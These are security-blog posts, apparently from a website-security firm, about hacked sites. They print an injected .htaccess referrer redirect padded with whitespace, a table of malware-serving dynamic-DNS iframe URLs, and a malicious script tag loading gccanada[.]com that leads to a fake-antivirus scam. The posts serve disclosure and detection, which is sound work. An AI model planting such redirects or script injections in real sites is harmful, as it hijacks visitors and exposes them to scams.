Tag: Malware Analysis & Compromises

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we areseeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can\’t say for sure. We will post more details when we find out what is going on.

If you look at the top domains distributing malware for the last days (and months), what do you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe  http://cvrtyi.ddns.info/nighttrend.cgi?8
315 iframe  http://byiegfs.ddns.info/nighttrend.cgi?8
275 iframe  http://ileshdg.qhigh.com/nighttrend.cgi?8
179 iframe  http://sdcmd.freewww.info/nighttrend.cgi?8
159 iframe  http://lmybv.ddns.name/nighttrend.cgi?8
148 iframe  http://wstckewb.freewww.biz/nighttrend.cgi?8
146 iframe  http://zqajsv.qhigh.com/nighttrend.cgi?8
126 iframe  http://avvof.sellClassics.com/nighttrend.cgi?8
116 iframe  http://wnevt.pcanywhere.net/nighttrend.cgi?8
101 iframe  http://acijwfr.freewww.info/nighttrend.cgi?8
93  iframe  http://cqcsk.ddns.name/facebook.cgi?8
84  iframe  http://thcolxbbt.qhigh.com/facebook.cgi?8
77  iframe  http://bwnzgtv.qhigh.com/facebook.cgi?8
74  iframe  http://anmvmhz.ddns.info/facebook.cgi?8
73  iframe  http://hbuwmx.myddns.com/facebook.cgi?8
72  iframe  http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) sub domain as the first level of injection. Just check ddns.info, qhigh.com,mynumber.org, pcanywhere.net, etc, etc. They are all part of: http://www.changeip.com/. Just in the last 60 days, weidentified more than 15,000 different sub domains from them being used to distribute malware.

Don\’t get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklistingand some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with thethousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com. That’s the code being added to the hacked sites:

script type=’text/javascript’ src=”http://gccanada[.]com/jquery[.]js

What is so bad about it? The final domain \’freeresultsguide.com\’, pushes you to buy a fake anti virus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gcanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.